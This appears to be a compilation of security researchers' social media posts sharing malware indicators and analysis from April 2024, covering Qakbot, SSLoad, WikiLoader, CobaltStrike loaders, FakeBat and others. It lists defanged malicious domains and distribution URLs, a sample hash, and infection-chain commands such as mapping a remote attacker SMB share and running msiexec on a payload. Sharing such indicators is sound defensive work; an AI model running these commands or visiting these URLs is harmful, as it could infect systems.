Researchers at Proofpoint and TEAM CYMRU - S2 Threat Research Team predict Latrodectus, a new malware used by initial access brokers (IABs), will continue gaining momentum among threat actors due to its ability to evade sandbox detection.

Dark Reading has the details: ow.ly/o2oQ50RbEPu.

💻 Ever wondered how cyber threats disguise themselves to avoid detection? 

In this article, we explore the intricate techniques of obfuscators such as .NET Reactor and #SmartAssembly . Get ready to explore deobfuscation techniques and create own tools 👇

any.run/cybersecurity-…

Be alert that there is Qakbot being spread in the wild:
49220571574da61781de37f35c66e8f0dadb18fdedb6d3a1be67485069cfd4b0

Campaign: tchk08

ITW URLs on Virustotal:
upd5[.]pro
upd112.appspot[.]com

Here are some #ssload #ta578 IOCs from today:
github.com/executemalware…

#SSLoad - #TA578 - url > .js > smb > .msi

wscript.exe Doc_m42_81h118103-88o62135w8623-1999q9.js

net use A: \\krd6.]com@80\share\ /persistent:no

msiexec.exe /I avp.msi

msiexec.exe /V

(1/3) 👇

IOC's
github.com/pr0xylife/SSLo…

#WikiLoader - #TA544 - .pdf > url > .zip > .js > .js > .dll

wscript Invoice_818493.js

wscript out.js

C:\Users\Admin\AppData\Local\Temp\npp.8.6.4.portable.x64\notepad.exe (sideload)👇

\npp.8.6.3.portable.x64\plugins\mimeTools.dll

(1/3) 👇

IOC's
github.com/pr0xylife/Wiki…

2024-04-15 (Monday): #ContactForms campaign pushing #SSLoad malware as early as Thursday, 2024-04-11. List of indicators available at bit.ly/49Cz1kL

#Wirshark #Unit42ThreatIntel #TimelyThreatIntel #InfectionTraffic

Here are some IOCs from a sample that was analyzed on Friday. It seems to be #xloader #formbook but I could be mistaken.
github.com/executemalware…

Here are IOCs from a likely #kutaki #stealer sample from today.
github.com/executemalware…

distro 👇
https://proactivesolutionsmc.]com/fossil/joggling/?a=x
https://recruitment-filetransfertools.]com/?a=x
https://recruitment-filetransfertools.]com/save.php

https://felizcity.]com/wp-content/plugins/jetpack/json-endpoints/jetpack/Hays_compiled_documents.zip

#ISFB #LDR4 - url > .zip > .js > CobaltStrike

Interesting campaign this week purporting to be Hays Recruitment.

DocuSign lure that leads to a site that drops a zip file that contains a .js loader for #CobaltStrike

(1/3)👇IOC's continued

Check out the short writeup on the recent #FakeBat infection involving #PaykRunPE 🦇

esentire.com/blog/the-retur…

🚨 In this video, we'll explore memory dumps from @hatching_io/Triage sandbox and find #redline stealer unpacked, then use hasherezade's #pebear to fix section alignment to analyze w/ #dnSpyEx and identify config data 👇

⚒️ youtu.be/X0gpApgyS1E

Here are some #darkgate IOCs from today:
#admin888 #edr3

github.com/executemalware…

We are seeing #FakeBat being delivered v ia #FakeUpdates now. I suspect that FakeBat is purchased by threat actors behind ClearFake. We have seen them using Hijack Loader/IDAT Loader before for FakeBat post-infection 🤔

Our latest post has just gone live! In this one, we're looking at using Capstone Disassembler, Unicorn Emulation Framework, and Python to defeat encrypted stack strings within a Conti ransomware sample

0ffset.net/reverse-engine…

New blog out on #TA547 and #Rhadamanthys out. This isn't really a deep dive, but it's important to get blogs out in shorter time to the community too, in addition to the deep dives.
The actor has continued with almost daily similar campaigns since March 26th.

Do you enjoy solving programming puzzles? Want to uncover what a malicious attacker is actually trying to do with their code?

Check out my latest video, where we manually deobfuscate and Reverse Engineer an obfuscated JavaScript file!

youtu.be/2iBqqPmUYfE